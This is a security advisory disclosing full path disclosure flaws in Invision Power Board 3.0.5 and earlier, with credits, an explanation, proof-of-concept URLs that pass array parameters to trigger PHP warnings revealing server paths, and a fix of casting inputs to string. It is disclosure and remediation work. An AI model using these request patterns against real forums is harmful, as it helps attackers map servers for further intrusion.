[MajorSecurity SA-067]Invision Power Board 3.0.5 - full path disclosures
Details
=======
Product: Invision Power Board 3.x
Security-Risk: low
Remote-Exploit: yes
Vendor-URL: http://www.invisionpower.com
Vendor-Status: informed
Advisory-Status: published
Credits
============
Discovered by: David Vieira-Kurz
http://www.majorsecurity.net/penetrationstest.php
Affected Products:
----------------------------
Invision Power Board 3.0.5 and prior
Introduction
============
"Invision Power Board is a widely-used general-purpose forums script."
More Details
============
1. Full Path Disclosure
-----------------------------------
There are several PHP functions that takes strings as parameters and will raise warnings when values that are passed are arrays rather then strings. To get the path of the current script, the attacker simply needs to pass the arguments as arrays rather then expected strings and then simply read the warning message generated by PHP to see the error including the full path of the current running script.
Proof of concept:
-----------------------------------
/index.php?showforum[]=2
Warning: Illegal offset type in
[PATH_TO_IPB]/admin/applications/forums/sources/classes/forums/class_forums.php
on line 631
/index.php?app=core&module=usercp&tab[]=blog&area[]=settings
Warning: Illegal offset type in isset or empty in
[PATH_TO_IPB]/admin/sources/base/core.php on line 2169
/admin/index.php?adsess=151977c397511a9cad960c71e0575e23&old_adsess=&app[]=core&
Warning: Constants may only evaluate to scalar values in
/admin/sources/base/ipsRegistry.php on line 1476
Warning: Illegal offset type in isset or empty in
[PATH_TO_IPB]/admin/sources/base/core.php on line 2240
/index.php?adsess=2809f1f10d21bcfc90c65b600f68d2e4&app=forums&&module=forums§ion=forums&messageinabottleacp[]=X
Warning: urldecode() expects parameter 1 to be string, array given in
[PATH_TO_IPB]/admin/sources/classes/class_admin_functions.php on line 73
Solution
================
I would NOT recommend to just react by "security through obscurity" and turn off the error messages, error reporting etc. This is not a solution because there are a lot of users that are having "shared hosting servers" where they aren't able to manipulate the "php.ini" configuration file - even ini_set() is forbidden on some shared hosting servers. So they still would have the full path disclosure there.
Workaround
================
I would recommend to meticulously go through the code forcing PHP to cast the data to the desired type, in this case the (string) casts to eliminate the notice or warning messages.
MajorSecurity
================
MajorSecurity is a German penetrationtesting and security research
company which focuses
on web application security. We offer professional penetration testings,
security audits,
source code reviews.
-- David Vieira-Kurz (CTO) Senior IT Security Consultant MajorSecurity Phone: +49 151 24 132 139 Web: http://www.majorsecurity.net Diese E-mail (sowie ihre Anhnge) ist vertraulich und nur fr den/die Adressaten bestimmt.